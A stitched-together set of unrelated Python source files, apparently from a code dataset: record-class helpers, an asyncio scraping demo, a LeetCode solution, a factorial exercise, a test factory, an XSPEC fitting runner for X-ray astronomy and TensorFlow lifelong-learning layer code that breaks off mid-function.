if getattr(record_class, "__attrs_attrs__", None) is not None:
raise NotARecordClass(
f"can't accept '{record_class.__name__}' because it is an attrs class and attrs is not installed"
)
raise NotARecordClass(
f"class '{record_class.__name__}' is not a dataclass nor an attrs class"
)
@classmethod
def get_field(cls, field: FieldType) -> RecordField:
"""
Wrap field with field classes with a uniform interface.
"""
return cls.field_wrapper_type(field)
| 3,589 | 1,022 |
# type: ignore
import asyncio
from scrapeacademy import context, run
async def get_concurrent(url):
# Get a same page 10 times simultaneously
tasks = [context.get(url) for _ in range(10)]
n = 1
while tasks:
done, tasks = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
for result in done:
print(f"done #{n}", result.result()[:10])
n += 1
print("done")
run(get_concurrent("https://www.python.jp/"))
| 481 | 166 |
class Solution:
def maxAncestorDiff(self, root: Optional[TreeNode]) -> int:
def dfs(root, mn, mx):
if not root: return 0
res = max(abs(root.val - mn), abs(root.val - mx))
mn, mx = min(mn, root.val), max(mx, root.val)
return max(res, dfs(root.left, mn, mx), dfs(root.right, mn, mx))
return dfs(root, root.val, root.val) | 395 | 143 |
# ex7_7.py
def f(n):
"""
n: integer, n >= 0.
"""
if n == 0:
return 1
else:
return n * f(n-1)
if __name__ == "__main__":
print(f(0))
print(f(1))
print(f(3))
print(f(5))
| 213 | 105 |
import factory
import factory.faker
from datetime import timedelta
from faker import Factory
faker = Factory.create()
from zeus import models
from zeus.config import db
from zeus.utils import timezone
from .base import ModelFactory
class RevisionFactory(ModelFactory):
sha = factory.Faker("sha1")
repository = factory.SubFactory("zeus.factories.RepositoryFactory")
repository_id = factory.SelfAttribute("repository.id")
message = factory.LazyAttribute(
lambda o: "{}\n\n{}".format(faker.sentence(), faker.sentence())
)
date_created = factory.LazyAttribute(
lambda o: timezone.now() - timedelta(minutes=30)
)
@factory.post_generation
def authors(self, create, extracted, **kwargs):
if not create:
return
if extracted:
self.authors = extracted
db.session.flush()
class Meta:
model = models.Revision
| 919 | 265 |
# This code is a part of XMM: Generate and Analyse (XGA), a module designed for the XMM Cluster Survey (XCS).
# Last modified by David J Turner (david.turner@sussex.ac.uk) 09/06/2021, 16:34. Copyright (c) David J Turner
import os
import warnings
from functools import wraps
# from multiprocessing.dummy import Pool
from multiprocessing import Pool
from subprocess import Popen, PIPE, TimeoutExpired
from typing import Tuple, Union
import fitsio
import pandas as pd
from fitsio import FITS
from tqdm import tqdm
from .. import XSPEC_VERSION
from ..exceptions import XSPECFitError, MultipleMatchError, NoMatchFoundError, XSPECNotFoundError
from ..samples.base import BaseSample
from ..sources import BaseSource
def execute_cmd(x_script: str, out_file: str, src: str, run_type: str, timeout: float) \
-> Tuple[Union[FITS, str], str, bool, list, list]:
"""
This function is called for the local compute option. It will run the supplied XSPEC script, then check
parse the output for errors and check that the expected output file has been created.
:param str x_script: The path to an XSPEC script to be run.
:param str out_file: The expected path for the output file of that XSPEC script.
:param str src: A string representation of the source object that this fit is associated with.
:param str run_type: A flag that tells this function what type of run this is; e.g. fit or conv_factors.
:param float timeout: The length of time (in seconds) which the XSPEC script is allowed to run for before being
killed.
:return: FITS object of the results, string repr of the source associated with this fit, boolean variable
describing if this fit can be used, list of any errors found, list of any warnings found.
:rtype: Tuple[Union[FITS, str], str, bool, list, list]
"""
if XSPEC_VERSION is None:
raise XSPECNotFoundError("There is no XSPEC installation detectable on this machine.")
# We assume the output will be usable to start with
usable = True
cmd = "xspec - {}".format(x_script)
# I add exec to the beginning to make sure that the command inherits the same process ID as the shell, which
# allows the timeout to kill the XSPEC run rather than the shell process. Entirely thanks to slayton on
# https://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true
xspec_proc = Popen("exec " + cmd, shell=True, stdout=PIPE, stderr=PIPE)
# This makes sure the process is killed if it does timeout
try:
out, err = xspec_proc.communicate(timeout=timeout)
except TimeoutExpired:
xspec_proc.kill()
out, err = xspec_proc.communicate()
# Need to infer the name of the source to supply it in the warning
source_name = x_script.split('/')[-1].split("_")[0]
warnings.warn("An XSPEC fit for {} has timed out".format(source_name))
usable = False
out = out.decode("UTF-8").split("\n")
err = err.decode("UTF-8").split("\n")
err_out_lines = [line.split("***Error: ")[-1] for line in out if "***Error" in line]
warn_out_lines = [line.split("***Warning: ")[-1] for line in out if "***Warning" in line]
err_err_lines = [line.split("***Error: ")[-1] for line in err if "***Error" in line]
warn_err_lines = [line.split("***Warning: ")[-1] for line in err if "***Warning" in line]
if usable and len(err_out_lines) == 0 and len(err_err_lines) == 0:
usable = True
else:
usable = False
error = err_out_lines + err_err_lines
warn = warn_out_lines + warn_err_lines
if os.path.exists(out_file + "_info.csv") and run_type == "fit":
# The original version of the xga_output.tcl script output everything as one nice neat fits file
# but life is full of extraordinary inconveniences and for some reason it didn't work if called from
# a Jupyter Notebook. So now I'm going to smoosh all the csv outputs into one fits.
results = pd.read_csv(out_file + "_results.csv", header="infer")
# This is the csv with the fit results in, creates new fits file and adds in
fitsio.write(out_file + ".fits", results.to_records(index=False), extname="results", clobber=True)
del results
# The information about individual spectra, exposure times, luminosities etc.
spec_info = pd.read_csv(out_file + "_info.csv", header="infer")
# Gets added into the existing file
fitsio.write(out_file + ".fits", spec_info.to_records(index=False), extname="spec_info")
del spec_info
# This finds all of the matching spectrum plot csvs were generated
rel_path = "/".join(out_file.split('/')[0:-1])
# This is mostly just used to find how many files there are
spec_tabs = [rel_path + "/" + sp for sp in os.listdir(rel_path)
if "{}_spec".format(out_file) in rel_path + "/" + sp]
for spec_i in range(1, len(spec_tabs)+1):
# Loop through and redefine names like this to ensure they're in the right order
spec_plot = pd.read_csv(out_file + "_spec{}.csv".format(spec_i), header="infer")
# Adds all the plot tables into the existing fits file in the right order
fitsio.write(out_file + ".fits", spec_plot.to_records(index=False), extname="plot{}".format(spec_i))
del spec_plot
# This reads in the fits we just made
with FITS(out_file + ".fits") as res_tables:
tab_names = [tab.get_extname() for tab in res_tables]
if "results" not in tab_names or "spec_info" not in tab_names:
usable = False
# I'm going to try returning the file path as that should be pickleable
res_tables = out_file + ".fits"
elif os.path.exists(out_file) and run_type == "conv_factors":
res_tables = out_file
usable = True
else:
res_tables = None
usable = False
return res_tables, src, usable, error, warn
def xspec_call(xspec_func):
"""
This is used as a decorator for functions that produce XSPEC scripts. Depending on the
system that XGA is running on (and whether the user requests parallel execution), the method of
executing the XSPEC commands will change. This supports multi-threading.
:return:
"""
@wraps(xspec_func)
def wrapper(*args, **kwargs):
# The first argument of all of these XSPEC functions will be the source object (or a list of),
# so rather than return them from the XSPEC model function I'll just access them like this.
if isinstance(args[0], BaseSource):
sources = [args[0]]
elif isinstance(args[0], (list, BaseSample)):
sources = args[0]
else:
raise TypeError("Please pass a source object, or a list of source objects.")
# This is the output from whatever function this is a decorator for
# First return is a list of paths of XSPEC scripts to execute, second is the expected output paths,
# and 3rd is the number of cores to use.
# run_type describes the type of XSPEC script being run, for instance a fit or a fakeit run to measure
# countrate to luminosity conversion constants
script_list, paths, cores, run_type, src_inds, radii, timeout = xspec_func(*args, **kwargs)
src_lookup = {repr(src): src_ind for src_ind, src in enumerate(sources)}
rel_src_repr = [repr(sources[src_ind]) for src_ind in src_inds]
# Make sure the timeout is converted to seconds, then just stored as a float
timeout = timeout.to('second').value
# This is what the returned information from the execute command gets stored in before being parceled out
# to source and spectrum objects
results = {s: [] for s in src_lookup}
if run_type == "fit":
desc = "Running XSPEC Fits"
elif run_type == "conv_factors":
desc = "Running XSPEC Simulations"
if len(script_list) > 0:
# This mode runs the XSPEC locally in a multiprocessing pool.
with tqdm(total=len(script_list), desc=desc) as fit, Pool(cores) as pool:
def callback(results_in):
"""
Callback function for the apply_async pool method, gets called when a task finishes
and something is returned.
"""
nonlocal fit # The progress bar will need updating
nonlocal results # The dictionary the command call results are added to
if results_in[0] is None:
fit.update(1)
return
else:
res_fits, rel_src, successful, err_list, warn_list = results_in
results[rel_src].append([res_fits, successful, err_list, warn_list])
fit.update(1)
for s_ind, s in enumerate(script_list):
pth = paths[s_ind]
src = rel_src_repr[s_ind]
pool.apply_async(execute_cmd, args=(s, pth, src, run_type, timeout), callback=callback)
pool.close() # No more tasks can be added to the pool
pool.join() # Joins the pool, the code will only move on once the pool is empty.
elif len(script_list) == 0:
warnings.warn("All XSPEC operations had already been run.")
# Now we assign the fit results to source objects
for src_repr in results:
# Made this lookup list earlier, using string representations of source objects.
# Finds the ind of the list of sources that we should add these results to
ind = src_lookup[src_repr]
s = sources[ind]
# This flag tells this method if the current set of fits are part of an annular spectra or not
ann_fit = False
ann_results = {}
ann_lums = {}
ann_obs_order = {}
for res_set in results[src_repr]:
if len(res_set) != 0 and res_set[1] and run_type == "fit":
with FITS(res_set[0]) as res_table:
global_results = res_table["RESULTS"][0]
model = global_results["MODEL"].strip(" ")
# Just define this to check if this is an annular fit or not
first_key = res_table["SPEC_INFO"][0]["SPEC_PATH"].strip(" ").split("/")[-1].split('ra')[-1]
first_key = first_key.split('_spec.fits')[0]
if "_ident" in first_key:
ann_fit = True
inst_lums = {}
obs_order = []
for line_ind, line in enumerate(res_table["SPEC_INFO"]):
sp_info = line["SPEC_PATH"].strip(" ").split("/")[-1].split("_")
# Want to derive the spectra storage key from the file name, this strips off some
# unnecessary info
sp_key = line["SPEC_PATH"].strip(" ").split("/")[-1].split('ra')[-1].split('_spec.fits')[0]
# If its not an AnnularSpectra fit then we can just fetch the spectrum from the source
# the normal way
if not ann_fit:
# This adds ra back on, and removes any ident information if it is there
sp_key = 'ra' + sp_key
# Finds the appropriate matching spectrum object for the current table line
spec = s.get_products("spectrum", sp_info[0], sp_info[1], extra_key=sp_key)[0]
else:
obs_order.append([sp_info[0], sp_info[1]])
ann_id = int(sp_key.split("_ident")[-1].split("_")[1])
sp_key = 'ra' + sp_key.split('_ident')[0]
first_part = sp_key.split('ri')[0]
second_part = "_" + "_".join(sp_key.split('ro')[-1].split("_")[1:])
ann_sp_key = first_part + "ar" + "_".join(radii[ind].value.astype(str)) + second_part
ann_specs = s.get_products("combined_spectrum", extra_key=ann_sp_key)
if len(ann_specs) > 1:
raise MultipleMatchError("I have found multiple matches for that AnnularSpectra, "
"this is the developers fault, not yours.")
elif len(ann_specs) == 0:
raise NoMatchFoundError("Somehow I haven't found the AnnularSpectra that you "
"fitted, this is the developers fault, not yours")
else:
ann_spec = ann_specs[0]
spec = ann_spec.get_spectra(ann_id, sp_info[0], sp_info[1])
# Adds information from this fit to the spectrum object.
spec.add_fit_data(str(model), line, res_table["PLOT"+str(line_ind+1)])
# The add_fit_data method formats the luminosities nicely, so we grab them back out
# to help grab the luminosity needed to pass to the source object 'add_fit_data' method
processed_lums = spec.get_luminosities(model)
if spec.instrument not in inst_lums:
inst_lums[spec.instrument] = processed_lums
# Ideally the luminosity reported in the source object will be a PN lum, but its not impossible
# that a PN value won't be available. - it shouldn't matter much, lums across the cameras are
# consistent
if "pn" in inst_lums:
chosen_lums = inst_lums["pn"]
# mos2 generally better than mos1, as mos1 has CCD damage after a certain point in its life
elif "mos2" in inst_lums:
chosen_lums = inst_lums["mos2"]
else:
chosen_lums = inst_lums["mos1"]
if ann_fit:
ann_results[spec.annulus_ident] = global_results
ann_lums[spec.annulus_ident] = chosen_lums
ann_obs_order[spec.annulus_ident] = obs_order
elif not ann_fit:
# Push global fit results, luminosities etc. into the corresponding source object.
s.add_fit_data(model, global_results, chosen_lums, sp_key)
elif len(res_set) != 0 and res_set[1] and run_type == "conv_factors":
res_table = pd.read_csv(res_set[0], dtype={"lo_en": str, "hi_en": str})
# Gets the model name from the file name of the output results table
model = res_set[0].split("_")[-3]
# We can infer the storage key from the name of the results table, just makes it easier to
# grab the correct spectra
storage_key = res_set[0].split('/')[-1].split(s.name)[-1][1:].split(model)[0][:-1]
# Grabs the ObsID+instrument combinations from the headers of the csv. Makes sure they are unique
# by going to a set (because there will be two columns for each ObsID+Instrument, rate and Lx)
# First two columns are skipped because they are energy limits
combos = list(set([c.split("_")[1] for c in res_table.columns[2:]]))
# Getting the spectra for each column, then assigning rates and lums
for comb in combos:
spec = s.get_products("spectrum", comb[:10], comb[10:], extra_key=storage_key)[0]
spec.add_conv_factors(res_table["lo_en"].values, res_table["hi_en"].values,
res_table["rate_{}".format(comb)].values,
res_table["Lx_{}".format(comb)].values, model)
elif len(res_set) != 0 and not res_set[1]:
for err in res_set[2]:
raise XSPECFitError(err)
if ann_fit:
# We fetch the annular spectra object that we just fitted, searching by using the set ID of
# the last spectra that was opened in the loop
ann_spec = s.get_annular_spectra(set_id=spec.set_ident)
try:
ann_spec.add_fit_data(model, ann_results, ann_lums, ann_obs_order)
# The most likely reason for running XSPEC fits to a profile is to create a temp. profile
# so we check whether constant*tbabs*apec (single_temp_apec function)has been run and if so
# generate a Tx profile automatically
if model == "constant*tbabs*apec":
temp_prof = ann_spec.generate_profile(model, 'kT', 'keV')
s.update_products(temp_prof)
# Normalisation profiles can be useful for many things, so we generate them too
norm_prof = ann_spec.generate_profile(model, 'norm', 'cm^-5')
s.update_products(norm_prof)
if 'Abundanc' in ann_spec.get_results(0, 'constant*tbabs*apec'):
met_prof = ann_spec.generate_profile(model, 'Abundanc', '')
s.update_products(met_prof)
else:
raise NotImplementedError("How have you even managed to fit this model to a profile?! Its not"
" supported yet.")
except ValueError:
warnings.warn("{src} annular spectra profile fit was not successful".format(src=ann_spec.src_name))
# If only one source was passed, turn it back into a source object rather than a source
# object in a list.
if len(sources) == 1:
sources = sources[0]
return sources
return wrapper
| 18,701 | 5,125 |
import numpy as np
import tensorflow as tf
from utils.utils import *
from utils.utils_nn import *
###########################################################
##### functions to generate parameter #####
###########################################################
#### function to generate knowledge-base parameters for ELLA_tensorfactor layer
def new_ELLA_KB_param(shape, layer_number, task_number, reg_type, init_tensor=None, trainable=True):
#kb_name = 'KB_'+str(layer_number)+'_'+str(task_number)
kb_name = 'KB_'+str(layer_number)
if init_tensor is None:
param_to_return = tf.get_variable(name=kb_name, shape=shape, dtype=tf.float32, regularizer=reg_type, trainable=trainable)
elif type(init_tensor) == np.ndarray:
param_to_return = tf.get_variable(name=kb_name, shape=shape, dtype=tf.float32, regularizer=reg_type, initializer=tf.constant_initializer(init_tensor), trainable=trainable)
else:
param_to_return = init_tensor
return param_to_return
#### function to generate task-specific parameters for ELLA_tensorfactor layer
def new_ELLA_cnn_deconv_TS_param(shape, layer_number, task_number, reg_type):
ts_w_name, ts_b_name, ts_p_name = 'TS_DeconvW0_'+str(layer_number)+'_'+str(task_number), 'TS_Deconvb0_'+str(layer_number)+'_'+str(task_number), 'TS_Convb0_'+str(layer_number)+'_'+str(task_number)
return [tf.get_variable(name=ts_w_name, shape=shape[0], dtype=tf.float32, regularizer=reg_type), tf.get_variable(name=ts_b_name, shape=shape[1], dtype=tf.float32, regularizer=reg_type), tf.get_variable(name=ts_p_name, shape=shape[2], dtype=tf.float32, regularizer=reg_type)]
#### function to generate task-specific parameters for ELLA_tensorfactor layer
def new_ELLA_cnn_deconv_tensordot_TS_param(shape, layer_number, task_number, reg_type, init_tensor, trainable):
ts_w_name, ts_b_name, ts_k_name, ts_p_name = 'TS_DeconvW0_'+str(layer_number)+'_'+str(task_number), 'TS_Deconvb0_'+str(layer_number)+'_'+str(task_number), 'TS_ConvW1_'+str(layer_number)+'_'+str(task_number), 'TS_Convb0_'+str(layer_number)+'_'+str(task_number)
params_to_return, params_name = [], [ts_w_name, ts_b_name, ts_k_name, ts_p_name]
for i, (t, n) in enumerate(zip(init_tensor, params_name)):
if t is None:
params_to_return.append(tf.get_variable(name=n, shape=shape[i], dtype=tf.float32, regularizer=reg_type if trainable and i<3 else None, trainable=trainable))
elif type(t) == np.ndarray:
params_to_return.append(tf.get_variable(name=n, shape=shape[i], dtype=tf.float32, regularizer=reg_type if trainable and i<3 else None, trainable=trainable, initializer=tf.constant_initializer(t)))
else:
params_to_return.append(t)
return params_to_return
#### function to generate task-specific parameters for ELLA_tensorfactor layer
def new_ELLA_cnn_deconv_tensordot_TS_param2(shape, layer_number, task_number, reg_type):
ts_w_name, ts_b_name, ts_k_name, ts_k_name2, ts_p_name = 'TS_DeconvW0_'+str(layer_number)+'_'+str(task_number), 'TS_Deconvb0_'+str(layer_number)+'_'+str(task_number), 'TS_tdot_W1_'+str(layer_number)+'_'+str(task_number), 'TS_tdot_W2_'+str(layer_number)+'_'+str(task_number), 'TS_tdot_b0_'+str(layer_number)+'_'+str(task_number)
return [tf.get_variable(name=ts_w_name, shape=shape[0], dtype=tf.float32, regularizer=reg_type), tf.get_variable(name=ts_b_name, shape=shape[1], dtype=tf.float32, regularizer=reg_type), tf.get_variable(name=ts_k_name, shape=shape[2], dtype=tf.float32, regularizer=reg_type), tf.get_variable(name=ts_k_name2, shape=shape[3], dtype=tf.float32, regularizer=reg_type), tf.get_variable(name=ts_p_name, shape=shape[4], dtype=tf.float32, regularizer=reg_type)]
###############################################################
##### functions for adding ELLA network (CNN/Deconv ver) #####
###############################################################
#### function to generate convolutional layer with shared knowledge base
#### KB_size : [filter_height(and width), num_of_channel]
#### TS_size : deconv_filter_height(and width)
#### TS_stride_size : [stride_in_height, stride_in_width]
def new_ELLA_cnn_deconv_layer(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_size=None, skip_connect_input=None):
assert (k_size[0] == k_size[1] and k_size[0] == (KB_size[0]-1)*TS_stride_size[0]+1), "CNN kernel size does not match the output size of Deconv from KB"
with tf.name_scope('ELLA_cdnn_KB'):
if KB_param is None:
## KB \in R^{1 \times h \times w \times c}
KB_param = new_ELLA_KB_param([1, KB_size[0], KB_size[0], KB_size[1]], layer_num, task_num, KB_reg_type)
if TS_param is None:
## TS1 : Deconv W \in R^{h \times w \times ch_in*ch_out \times c}
## TS2 : Deconv bias \in R^{ch_out}
TS_param = new_ELLA_cnn_deconv_TS_param([[TS_size, TS_size, ch_size[0]*ch_size[1], KB_size[1]], [1, 1, 1, ch_size[0]*ch_size[1]], [ch_size[1]]], layer_num, task_num, TS_reg_type)
with tf.name_scope('ELLA_cdnn_TS'):
para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [1, k_size[0], k_size[1], ch_size[0]*ch_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
if para_activation_fn is not None:
para_tmp = para_activation_fn(para_tmp)
W, b = tf.reshape(para_tmp, k_size+ch_size), TS_param[2]
layer_eqn, _ = new_cnn_layer(layer_input, k_size+ch_size, stride_size=stride_size, activation_fn=activation_fn, weight=W, bias=b, padding_type=padding_type, max_pooling=max_pool, pool_size=pool_size, skip_connect_input=skip_connect_input)
return layer_eqn, [KB_param], TS_param, [W, b]
#### function to generate network of convolutional layers with shared knowledge base
def new_ELLA_cnn_deconv_net(net_input, k_sizes, ch_sizes, stride_sizes, KB_sizes, TS_sizes, TS_stride_sizes, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_params=None, TS_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, input_size=[0, 0], task_index=0, skip_connections=[]):
_num_TS_param_per_layer = 3
## first element : make new KB&TS / second element : make new TS / third element : not make new para
control_flag = [(KB_params is None and TS_params is None), (not (KB_params is None) and (TS_params is None)), not (KB_params is None or TS_params is None)]
if control_flag[1]:
TS_params = []
elif control_flag[0]:
KB_params, TS_params = [], []
cnn_gen_params=[]
layers_for_skip, next_skip_connect = [net_input], None
with tf.name_scope('ELLA_cdnn_net'):
layers = []
for layer_cnt in range(len(k_sizes)//2):
next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
if next_skip_connect is not None:
skip_connect_in, skip_connect_out = next_skip_connect
assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
else:
skip_connect_in, skip_connect_out = -1, -1
if layer_cnt == skip_connect_out:
processed_skip_connect_input = layers_for_skip[skip_connect_in]
for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
else:
processed_skip_connect_input = None
if layer_cnt == 0 and control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[1]:
layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif layer_cnt == 0 and control_flag[2]:
layer_tmp, _, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[1]:
layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
elif control_flag[2]:
layer_tmp, _, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
layers.append(layer_tmp)
layers_for_skip.append(layer_tmp)
cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
if control_flag[1]:
TS_params = TS_params + TS_para_tmp
elif control_flag[0]:
KB_params = KB_params + KB_para_tmp
TS_params = TS_params + TS_para_tmp
if layer_cnt == skip_connect_out:
next_skip_connect = None
#### flattening output
if flat_output:
output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
else:
output_dim = layers[-1].shape[1:]
#### add dropout layer
if dropout:
layers.append(tf.nn.dropout(layers[-1], dropout_prob))
return (layers, KB_params, TS_params, cnn_gen_params, output_dim)
#### function to generate network of cnn->ffnn
def new_ELLA_cnn_deconv_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[]):
## add CNN layers
cnn_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, cnn_output_dim = new_ELLA_cnn_deconv_net(net_input, k_sizes, ch_sizes, stride_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_params=cnn_KB_params, TS_params=cnn_TS_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, input_size=input_size, task_index=task_index, skip_connections=skip_connections)
## add fc layers
#fc_model, fc_params = new_fc_net(cnn_model[-1], [cnn_output_dim[0]]+fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
fc_model, fc_params = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
return (cnn_model+fc_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params)
###########################################################################
##### functions for adding ELLA network (CNN/Deconv & Tensordot ver) #####
###########################################################################
#### KB_size : [filter_height(and width), num_of_channel]
#### TS_size : [deconv_filter_height(and width), deconv_filter_channel]
#### TS_stride_size : [stride_in_height, stride_in_width]
def new_ELLA_cnn_deconv_tensordot_layer(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_size=None, skip_connect_input=None, highway_connect_type=0, highway_W=None, highway_b=None, trainable=True, trainable_KB=True):
assert (k_size[0] == k_size[1] and k_size[0] == (KB_size[0]-1)*TS_stride_size[0]+1), "CNN kernel size does not match the output size of Deconv from KB"
with tf.name_scope('ELLA_cdnn_KB'):
## KB \in R^{1 \times h \times w \times c}
KB_param = new_ELLA_KB_param([1, KB_size[0], KB_size[0], KB_size[1]], layer_num, task_num, KB_reg_type, KB_param, trainable=trainable_KB)
## TS1 : Deconv W \in R^{h \times w \times kb_c_out \times c}
## TS2 : Deconv bias \in R^{kb_c_out}
## TS3 : tensor W \in R^{kb_c_out \times ch_in \times ch_out}
## TS4 : Conv bias \in R^{ch_out}
TS_param = new_ELLA_cnn_deconv_tensordot_TS_param([[TS_size[0], TS_size[0], TS_size[1], KB_size[1]], [1, 1, 1, TS_size[1]], [TS_size[1], ch_size[0], ch_size[1]], [ch_size[1]]], layer_num, task_num, TS_reg_type, [None, None, None, None] if TS_param is None else TS_param, trainable=trainable)
with tf.name_scope('DFCNN_param_gen'):
